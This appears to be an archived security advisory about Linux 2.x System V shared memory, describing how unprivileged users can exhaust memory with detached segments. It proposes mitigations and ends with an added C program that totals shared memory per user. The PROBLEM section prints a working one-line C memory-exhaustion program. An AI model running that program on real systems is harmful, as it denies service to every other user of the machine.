COMMAND

    IPC

SYSTEMS AFFECTED

    Linux 2.x

PROBLEM

    Michal Zalewski found the following.  The Linux IPC implementation
    seems to be broken.  In fact, any luser may consume all the memory
    available on the system using this simple program:

        extern int errno;int i,d=1;char*x;main(){while(1){x=shmat(shmget(0,10000000/
        d,511),0,0);if(errno){d*=10;continue;}for(i=0;i<10000000/d;i++)if(*(x+i));}}

    Memory won't be freed even if the luser's process is killed;  you
    have to use ipcrm, but there might not be enough memory left to run
    anything.  Under early 2.2.x, you have to run this program several
    times to ensure pages are detached (in this state, they are
    ownerless).

SOLUTION

    The simplest solution is to restrict IPC for lusers altogether.
    Only a few programs use IPC - probably only dosemu and ShoutCast.
    As Solar Designer said, there is a 'beancounter' feature (or
    per-user limits, instead of per-process).  Probably it will be
    implemented in 2.2.x kernels soon.  As of today, it's hard to
    control detached IPC pages.
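
    To make the per-user accounting idea concrete, the following added example (not part of the original advisory) totals System V shared memory by owner UID and counts segments with no attachments, which is the leftover state described under PROBLEM. It assumes a kernel that exposes /proc/sysvipc/shm, which the advisory does not mention; the sample rows are constructed and the 16 MiB per-user limit is illustrative.

```c
#include <stdio.h>
#include <string.h>
struct shm_usage {                      /* per-UID totals */
    unsigned uid;
    int segs, orphans;                  /* orphans: segments with nattch == 0 */
    unsigned long long bytes, orphan_bytes;
};

/* Aggregate text in /proc/sysvipc/shm layout by owner UID; returns UID count. */
int shm_account(const char *text, struct shm_usage *out, int max)
{
    int n = 0, i;
    while (*text) {
        char line[512];
        size_t len = strcspn(text, "\n");
        unsigned uid;
        unsigned long long size, nattch;
        snprintf(line, sizeof line, "%.*s", (int)len, text);
        /* key shmid perms size cpid lpid nattch uid ...; the header fails to parse */
        if (sscanf(line, "%*d %*d %*o %llu %*u %*u %llu %u", &size, &nattch, &uid) == 3) {
            for (i = 0; i < n && out[i].uid != uid; i++) {}
            if (i == n && n < max) out[n++] = (struct shm_usage){ .uid = uid };
            if (i < n) {                /* false only when the table is full */
                out[i].segs++;
                out[i].bytes += size;
                if (nattch == 0) { out[i].orphans++; out[i].orphan_bytes += size; }
            }
        }
        text += len + (text[len] == '\n');
    }
    return n;
}

/* Constructed sample, not captured output; columns after uid are omitted. */
static const char SAMPLE[] =
    "       key      shmid perms       size  cpid  lpid nattch   uid\n"
    "         0          0   777   10000000  4101  4101      0  1001\n"
    "         0      32769   777   10000000  4102  4102      0  1001\n"
    "1392508929      98307   600     393216   812   830      2  1000\n";

int main(void)
{
    struct shm_usage u[16];
    int i, n = shm_account(SAMPLE, u, 16);
    for (i = 0; i < n; i++)             /* flag users above a 16 MiB per-user total */
        printf("uid %u: %d segs, %llu bytes, %d unattached%s\n", u[i].uid, u[i].segs,
               u[i].bytes, u[i].orphans, u[i].bytes > (16ULL << 20) ? " OVER LIMIT" : "");
    return 0;
}
```

    Each sample segment of UID 1001 is below the limit on its own; only the per-user sum exceeds it, and both segments remain allocated with no process attached.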